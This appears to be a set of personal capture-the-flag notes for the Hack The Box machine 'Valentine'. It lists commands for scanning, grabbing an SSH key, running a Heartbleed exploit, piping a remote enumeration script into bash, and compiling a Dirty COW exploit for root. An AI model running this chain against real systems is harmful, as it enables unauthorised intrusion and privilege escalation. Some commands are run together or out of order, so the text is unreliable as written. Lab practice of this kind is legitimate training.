Valentine
HTB Linux
echo “10.129.1.190 valentine.htb” | sudo tee -a /etc/hosts
nmap -A -p- -oA output 10.129.1.190 —min-rate=10000 —script=vuln —script-timeout=15 -v
nmap -sC -sV -O -p- -oA valentine 10.129.1.190
nmap -sU -O -p- -oA valentine-udp 10.129.1.190
nikto -h 10.129.1.190:80
gobuster dir -k -u http://valentine.htb/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 100
https://0x1.gitlab.io/code/CyberChef/
wget https://10.129.1.190/dev/hype_key —no-check-certificate cat hype_key | xxd -r -p cat hype_key | xxd -r -p > encrypted_hype_key openssl rsa -in encrypted_hype_key -out decrypted_hype_key ssh -i decrypted_hype_key hype@10.129.1.190 chmod 400 encrypted_hype_key
git clone https://gist.github.com/10174134.git
python heartbleed.py -p 443 -n 10 10.129.1.190
python -m http.server 8888
curl http://10.129.1.190:8888/LinEnum.sh | bash
searchsploit dirty searchsploit -m 40839 cd /dev/shm && wget http://10.129.1.190:8888/40839.c
git clone https://gist.github.com/e9d4ff65d703a9084e85fa9df083c679.git https://github.com/FireFart/dirtycow/blob/master/dirty.c
hype@Valentine:/dev/shm$ gcc -pthread dc.c -o c -lcrypt hype@Valentine:/dev/shm$ chmod +x c hype@Valentine:/dev/shm$ ./c
hype@Valentine:/dev/shm$ su firefart Password test